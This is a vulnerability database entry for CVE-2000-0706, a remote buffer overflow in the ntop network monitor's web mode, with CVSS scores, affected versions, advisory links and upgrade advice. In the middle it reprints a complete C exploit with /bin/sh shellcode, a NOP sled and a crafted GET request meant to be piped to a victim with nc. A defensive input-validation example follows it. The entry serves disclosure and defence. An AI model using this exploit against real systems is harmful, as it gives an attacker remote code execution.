CVE-2000-0706
CVSS 10.0
Published: 2000-10-20 00:00:00
Revised: 2008-09-10 15:05:40

[Original] Buffer overflows in ntop running in web mode allow remote attackers to execute arbitrary commands.


[CNNVD] ntop buffer overflow vulnerability (CNNVD-200010-076)

ntop running in web mode contains a buffer overflow vulnerability. A remote attacker can exploit it to execute arbitrary code.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may bring the system down completely]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

cpe:/a:luca_deri:ntop:1.2a7_9
cpe:/a:luca_deri:ntop:1.3.1

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0706
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0706
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200010-076
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/1576
(VENDOR_ADVISORY)  BID  1576
http://www.debian.org/security/2000/20000830
(VENDOR_ADVISORY)  DEBIAN  20000830 ntop: Still remotely exploitable using buffer overflows
http://www.osvdb.org/1513
(UNKNOWN)  OSVDB  1513
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:36.ntop.asc
(UNKNOWN)  FREEBSD  FreeBSD-SA-00:36

- Vulnerability information

ntop buffer overflow vulnerability
Critical  Buffer overflow
2000-10-20 00:00:00 2005-05-02 00:00:00
Remote
ntop running in web mode contains a buffer overflow vulnerability. A remote attacker can exploit it to execute arbitrary code.

- Advisories and patches

- Vulnerability information (20150)

Luca Deri ntop 1.2 a7-9/1.3.1 Buffer Overflow Vulnerability (EDBID:20150)
unix remote
2000-08-14 Verified
0 Anonymous
N/A
source: http://www.securityfocus.com/bid/1576/info


ntop is a network usage monitoring tool for unix systems. It can be invoked at the console or as a server daemon, presenting statistics information via http with the -w parameter. In this mode, it is vulnerable to a buffer overflow before the user connecting to it can be authenticated. If exploited, an attacker can gain remote access to the system with the privileges ntop is executing with.

It is interesting to note that setuid ntop drops privileges before this can be exploited, but is installed on *BSD systems only executable by members of group wheel. This leads to the assumption that it may often be executed as root (since users in wheel typically have root access), so despite the fact that it drops privileges it can still yield remote root access for the attacker if exploited when run as root.


#include <stdio.h>
#include <stdlib.h>   /* exit(), atoi() */
#include <string.h>
#include <stdint.h>   /* uint32_t: the overwritten return address is a 32-bit value */

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

void usage(void)
{
 printf("NTOP ntop-1.2a1 -w mode command execution exploit.\n");
 printf("                                 mat@hacksware.com\n");
 printf("Usage : ./ntop-w-exp | nc victim port\n");
 exit(0);
}

#define CODE_LEN 240
#define NOP_LEN 50

int main( int argc, char *argv[] )
{
  int i,offset=-24;
  char code_buf[CODE_LEN + 4];   /* +4 so the last 4-byte write in the loop stays in bounds */
  unsigned long esp=0xbedffb00;  /* guessed stack address; tuned through the offset argument */

  if(argc >= 2) offset = atoi(argv[1]);

  memset(code_buf,0x90,NOP_LEN); /* NOP sled */
  memcpy(code_buf+NOP_LEN, shellcode, strlen(shellcode));
  /* pad the rest of the request with repeated copies of the guessed address */
  for(i=strlen(shellcode)+NOP_LEN;i<=CODE_LEN;i+=4)
     *(uint32_t *)&code_buf[i]=(uint32_t)(esp-offset);

  /* emit the request line: "GET /" followed by the raw CODE_LEN-byte payload */
  printf("GET /");
  for(i=0;i<CODE_LEN; i++)
     putchar(code_buf[i]);
  printf("\r\n\r\n");
  return 0;
}

- Vulnerability information

1513
ntop -w Option Filename Buffer Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- Vulnerability description

A remote overflow exists in ntop when running in 'web server' (-w) mode. The program fails to validate input to the filename variable resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.
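The defect described above is a request-target copied into a fixed-size filename buffer without a length check. The following is an added example, not ntop's code and not from any of the advisories linked here, of the bounded parsing that prevents it: the request-target of an HTTP request line is validated for length and byte content before anything is copied, and a constructed request shaped like the published exploit's output ("GET /" plus a run of 0x90 bytes) is classified. MAX_PATH_LEN and the function names are assumptions for this example.

```c
#include <string.h>

/* Upper bound on an accepted request-target (assumed value, not ntop's). */
#define MAX_PATH_LEN 128

enum path_status { PATH_OK = 0, PATH_MALFORMED, PATH_TOO_LONG, PATH_BAD_BYTE };

/* Bounded extraction of the request-target from a request line such as
 * "GET /index.html HTTP/1.0": length and byte checks run before any copy. */
enum path_status extract_request_path(const char *req, char *out, size_t outlen)
{
    const char *start = req + 4;
    size_t len, i;

    if (outlen > 0) out[0] = '\0';
    if (strncmp(req, "GET ", 4) != 0 || *start != '/')
        return PATH_MALFORMED;
    len = strcspn(start, " \r\n");      /* target ends at space or CR/LF */
    if (len > MAX_PATH_LEN || len + 1 > outlen)
        return PATH_TOO_LONG;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)start[i];
        if (c < 0x21 || c > 0x7e)      /* NOP sleds, shellcode, control bytes */
            return PATH_BAD_BYTE;
    }
    memcpy(out, start, len);
    out[len] = '\0';
    return PATH_OK;
}

/* Classify a complete request string. */
enum path_status check_request(const char *req)
{
    char path[MAX_PATH_LEN + 1];
    return extract_request_path(req, path, sizeof path);
}

/* Constructed sample shaped like the published exploit's output: "GET /",
 * then code_len bytes of 0x90 (the NOP sled), then CRLF CRLF. */
enum path_status check_sled_request(size_t code_len)
{
    char req[512];
    if (5 + code_len + 5 > sizeof req) return PATH_MALFORMED;
    memcpy(req, "GET /", 5);
    memset(req + 5, 0x90, code_len);
    memcpy(req + 5 + code_len, "\r\n\r\n", 5);  /* includes the NUL */
    return check_request(req);
}
```

The length check fires before the byte scan, so an exploit-length request is rejected as too long regardless of its contents, while a short request carrying a single non-printable byte is rejected by the byte check.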

- Timeline

2000-10-25 2000-08-14
2000-10-25 Unknown

- Solution

Upgrade to version 2.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

